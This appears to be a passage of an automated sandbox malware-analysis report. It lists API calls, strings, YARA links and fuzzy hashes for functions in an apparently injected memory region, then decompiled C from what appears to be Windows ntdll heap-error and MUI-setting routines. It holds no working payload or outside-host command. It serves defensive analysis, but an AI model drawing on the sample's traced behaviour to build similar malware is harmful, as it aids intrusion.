Function 028472D6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02847388

Strings

wininet.dll, xrefs: 0284733E, 02847347
net.dll, xrefs: 02847351, 028473AF, 028473BB

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: efadec65261b4323f713dc1b8d0f79edbc396d803a009f99e83ec2da23d8c0e7
Instruction ID: 9a1a6cd53d6d6b8f99321c50b88619d70eed54e395ef416c6cb373692fbf5d11
Opcode Fuzzy Hash: efadec65261b4323f713dc1b8d0f79edbc396d803a009f99e83ec2da23d8c0e7
Instruction Fuzzy Hash: 4D219EBA541208ABD710DF68C8A1FABF7B9AB88704F44811DFA199B241DB70B455CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 028488C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02833B93), ref: 028488FD

Strings

.z`, xrefs: 028488EC, 028488F8

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: d7516cbb5f5ed19cc98ce62609a08ac2f777ac923ec50bf7c78434cd5cd6dd69
Instruction ID: e543f04143256ea06c80a71843547539e6e24619e9d7650b6d1b8848cf3f70d1
Opcode Fuzzy Hash: d7516cbb5f5ed19cc98ce62609a08ac2f777ac923ec50bf7c78434cd5cd6dd69
Instruction Fuzzy Hash: FDE06DB92406096FDB14DFA9CC85EEB7BA9EF88350F104659F91DDB242C630E814CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 028488D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02833B93), ref: 028488FD

Strings

.z`, xrefs: 028488EC, 028488F8

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 133c4f9075c5b5a72430e6e979e2d3c710173edfe48abae515fca5b06914ec27
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 70E04FB52002086BDB14DF59CC48EA777ADEF88750F014554FD0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02837280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028372DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028372FB

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8f1fd1d9456a355b74d261fdbf160877b2cc2eabf2610664002d87684ce65099
Instruction ID: c529118bbc5b6e47cddf7bd9949554a076753c3d2f01e1c9211aa5f6ae261ca1
Opcode Fuzzy Hash: 8f1fd1d9456a355b74d261fdbf160877b2cc2eabf2610664002d87684ce65099
Instruction Fuzzy Hash: D701A779A8022977E721A6989C42FFEB76C6B40B51F140114FF04FA1C0EAD4A90546F6

Uniqueness

Uniqueness Score: -1.00%

Function 02839B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02839BB2

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: 02948185a960e5ceda059a2a4089a12b282aa642d9600e6d87b354cc5bd9d4b0
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: B9010CBED4020DABDF10DBA4DC41FDEB7B99B54308F044195E908D7281FA71E614CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0284893D, Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02848994

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 6863eec9b2aa6f6c08715c0f16b6cd354e2f6a087b460ba79e98e0a3a805b8ab
Instruction ID: 6ee3c33cc268b836ed5341514b791079973652e6715c64ad468579132de06dfe
Opcode Fuzzy Hash: 6863eec9b2aa6f6c08715c0f16b6cd354e2f6a087b460ba79e98e0a3a805b8ab
Instruction Fuzzy Hash: BD01AFB6210108BFCB54DF89DC84EEB77ADAF8C754F158258FA0DA7240DA30E851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02848940, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02848994

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: bb1edafae2c8ec0328e4ef261bc5f211fd895866607e85b8804d647a680ad955
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: EA01AFB6210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02847410, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0283CCF0,?,?), ref: 0284744C

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9abcbe253cf469668564967444c3008123f4f2599f3fe2ca5beb3f2f2cf34424
Instruction ID: 42e79708ba2800f09938eda51d4327f8725e77774137c021aa059fdb778393ef
Opcode Fuzzy Hash: 9abcbe253cf469668564967444c3008123f4f2599f3fe2ca5beb3f2f2cf34424
Instruction Fuzzy Hash: A3E06D7B3812083BE320659DAC02FA7B39C8B81B24F550026FB0DEA2C0D995F80146A9

Uniqueness

Uniqueness Score: -1.00%

Function 02848A2B, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFC2,0283CFC2,?,00000000,?,?), ref: 02848A60

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5f26f4ebee0a5a8f57eabba07b69591a85050ccc18da5ef208e83496c3f58495
Instruction ID: e7ef1664cc306dc73a85310c4e49d57451077695280f8e4c505b5b98c4bc3eb4
Opcode Fuzzy Hash: 5f26f4ebee0a5a8f57eabba07b69591a85050ccc18da5ef208e83496c3f58495
Instruction Fuzzy Hash: E0E01AB5204208ABDB24DF48CC84EEB37A9EF88750F0185A4FE095B241DA35E810CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 02848A30, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFC2,0283CFC2,?,00000000,?,?), ref: 02848A60

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 6df03d27707f038487e3ae9262a70726129f4d4577652e36ab0f16f124860fc2
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 6AE01AB52002086BDB20DF49CC84EE737ADAF88650F018554FA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02848890, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02843536,?,02843CAF,02843CAF,?,02843536,?,?,?,?,?,00000000,00000000,?), ref: 028488BD

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: dee716880b4f5265d999bdf6918aba0691e24adb970a22c624cd5c2f77522e81
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 57E046B5200208ABDB24EF99CC44EA777ADEF88750F118558FE089B241CA30F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0283D429, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02837C83,?), ref: 0283D45B

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2584e05548f628bd1d7d552503c16cfcd24be926a01b6eab51caa2c9e31144a1
Instruction ID: ffa726865acc483a70684a08fe0e3720855ea59ab2a1bc990caf278259b3f09f
Opcode Fuzzy Hash: 2584e05548f628bd1d7d552503c16cfcd24be926a01b6eab51caa2c9e31144a1
Instruction Fuzzy Hash: 80D02E7A7402082BE600ABE09C02F262286BB51AA5F194468F54CEA2C3CA20D0008220

Uniqueness

Uniqueness Score: -1.00%

Function 0283D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02837C83,?), ref: 0283D45B

Memory Dump Source

Source File: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Offset: 02830000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction ID: 900942bd7abb2580629808e65e5376ee04fd631a2c8005cbc37a2783bc8bd98b
Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction Fuzzy Hash: C8D05E697503082BE610AAA89C02F2672895B45A54F494064FA48D62C3DA50E4008561

Uniqueness

Uniqueness Score: -1.00%

Function 0469967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04699694

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2297685c0a3d6189f8ff301a0be7771632837941a64ec61e77fad212d428293
Instruction ID: 619f86a0f9bef928f5e745706e667714e4209c4df6cc184a0a0df20b99731675
Opcode Fuzzy Hash: a2297685c0a3d6189f8ff301a0be7771632837941a64ec61e77fad212d428293
Instruction Fuzzy Hash: CAB02BF19014C0C5FB00DB600608717390477D1300F12C011D1030290A0778D490F5B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0470B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Inpage error in %ws:%s, xrefs: 0470B418
read from, xrefs: 0470B4AD, 0470B4B2
*** enter .cxr %p for the context, xrefs: 0470B50D
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0470B323
This failed because of error %Ix., xrefs: 0470B446
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0470B38F
*** then kb to get the faulting stack, xrefs: 0470B51C
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0470B53F
write to, xrefs: 0470B4A6
*** enter .exr %p for the exception record, xrefs: 0470B4F1
<unknown>, xrefs: 0470B27E, 0470B2D1, 0470B350, 0470B399, 0470B417, 0470B48E
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0470B2DC
The critical section is owned by thread %p., xrefs: 0470B3B9
an invalid address, %p, xrefs: 0470B4CF
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0470B3D6
a NULL pointer, xrefs: 0470B4E0
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0470B314
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0470B305
The resource is owned exclusively by thread %p, xrefs: 0470B374
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0470B39B
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0470B476
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0470B484
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0470B47D
The instruction at %p referenced memory at %p., xrefs: 0470B432
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0470B2F3
The instruction at %p tried to %s , xrefs: 0470B4B6
Go determine why that thread has not released the critical section., xrefs: 0470B3C5
*** An Access Violation occurred in %ws:%s, xrefs: 0470B48F
*** Resource timeout (%p) in %ws:%s, xrefs: 0470B352
The resource is owned shared by %d threads, xrefs: 0470B37E

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 05a181141273ed0a0f83f75d27e97d9a7515c27c0386541d2c59b0c83d16968b
Instruction ID: e3570cfa44ec7cd322b1c6d2e21b211ae95e328e724b076588a4041545ab306d
Opcode Fuzzy Hash: 05a181141273ed0a0f83f75d27e97d9a7515c27c0386541d2c59b0c83d16968b
Instruction Fuzzy Hash: 8F8107B5A42210FFEF215E86CC49D7B3BA6EF86B59F408048F1052B391F261B611DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 04711C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04711C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x46348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0465B150();
				} else {
					E0465B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x474589c);
				E0465B150("Heap error detected at %p (heap handle %p)\n",  *0x47458a0);
				_t27 =  *0x4745898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04711E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0465B150();
				} else {
					E0465B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0465B150("Error code: %d - %s\n",  *0x4745898);
				_t113 =  *0x47458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0465B150();
					} else {
						E0465B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0465B150("Parameter1: %p\n",  *0x47458a4);
				}
				_t115 =  *0x47458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0465B150();
					} else {
						E0465B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0465B150("Parameter2: %p\n",  *0x47458a8);
				}
				_t117 =  *0x47458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0465B150();
					} else {
						E0465B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0465B150("Parameter3: %p\n",  *0x47458ac);
				}
				_t119 =  *0x47458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0465B150();
					} else {
						E0465B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x47458b4);
					E0465B150("Last known valid blocks: before - %p, after - %p\n",  *0x47458b0);
				} else {
					_t120 =  *0x47458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0465B150();
				} else {
					E0465B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0465B150("Stack trace available at %p\n", 0x47458c0);
			}

0x04711c10
0x04711c16
0x04711c1e
0x04711c3d
0x04711c3e
0x04711c20
0x04711c35
0x04711c3a
0x04711c44
0x04711c55
0x04711c5a
0x04711c65
0x04711c67
0x00000000
0x04711c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04711c67
0x04711cdc
0x04711ce5
0x04711d04
0x04711d05
0x04711ce7
0x04711cfc
0x04711d01
0x04711d0b
0x04711d17
0x04711d1f
0x04711d25
0x04711d30
0x04711d4f
0x04711d50
0x04711d32
0x04711d47
0x04711d4c
0x04711d61
0x04711d67
0x04711d68
0x04711d6e
0x04711d79
0x04711d98
0x04711d99
0x04711d7b
0x04711d90
0x04711d95
0x04711daa
0x04711db0
0x04711db1
0x04711db7
0x04711dc2
0x04711de1
0x04711de2
0x04711dc4
0x04711dd9
0x04711dde
0x04711df3
0x04711df9
0x04711dfa
0x04711e00
0x04711e0a
0x04711e13
0x04711e32
0x04711e33
0x04711e15
0x04711e2a
0x04711e2f
0x04711e39
0x04711e4a
0x04711e02
0x04711e02
0x04711e08
0x00000000
0x00000000
0x04711e08
0x04711e5b
0x04711e7a
0x04711e7b
0x04711e5d
0x04711e72
0x04711e77
0x04711e95

Strings

heap_failure_generic, xrefs: 04711C7C
heap_failure_block_not_busy, xrefs: 04711CA6
heap_failure_lfh_bitmap_mismatch, xrefs: 04711CD7
heap_failure_listentry_corruption, xrefs: 04711CD0
Parameter3: %p, xrefs: 04711DEE
Parameter1: %p, xrefs: 04711D5C
heap_failure_multiple_entries_corruption, xrefs: 04711C8A
heap_failure_virtual_block_corruption, xrefs: 04711C91
heap_failure_internal, xrefs: 04711C6E
heap_failure_invalid_allocation_type, xrefs: 04711CB4
HEAP[%wZ]: , xrefs: 04711C30, 04711CF7, 04711D42, 04711D8B, 04711DD4, 04711E25, 04711E6D
Stack trace available at %p, xrefs: 04711E86
Heap error detected at %p (heap handle %p), xrefs: 04711C50
heap_failure_buffer_underrun, xrefs: 04711C9F
heap_failure_buffer_overrun, xrefs: 04711C98
heap_failure_freelists_corruption, xrefs: 04711CC9
heap_failure_usage_after_free, xrefs: 04711CBB
Last known valid blocks: before - %p, after - %p, xrefs: 04711E45
heap_failure_entry_corruption, xrefs: 04711C83
Error code: %d - %s, xrefs: 04711D12
Parameter2: %p, xrefs: 04711DA5
heap_failure_cross_heap_operation, xrefs: 04711CC2
heap_failure_unknown, xrefs: 04711C75
HEAP: , xrefs: 04711C16, 04711C3D, 04711D04, 04711D4F, 04711D98, 04711DE1, 04711E32, 04711E7A
heap_failure_invalid_argument, xrefs: 04711CAD

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 93abd6ec27380035ef0d9be38369c242da2f30586bf6ef63040a875f14e06d89
Instruction ID: c02599d250804453cdb9716cdec2671eef6bb2f204c5ef2306d8440ae35cb587
Opcode Fuzzy Hash: 93abd6ec27380035ef0d9be38369c242da2f30586bf6ef63040a875f14e06d89
Instruction Fuzzy Hash: E461A536611184EFEB61AF99D489A3073A4F748A31F49806EFA095F360FA25FC409F4D

Uniqueness

Uniqueness Score: -1.00%

Function 04663D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04663D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04661B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04661B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04661B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04661B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04661B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04674620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0469F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E046A1370(_t276, 0x4634e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0469BB40(0,  &_v68, _t170);
									if(L046643C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0469BB40(_t257,  &_v68, _t243);
								if(L046643C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E046A1370(_t278, 0x4634e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04674620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
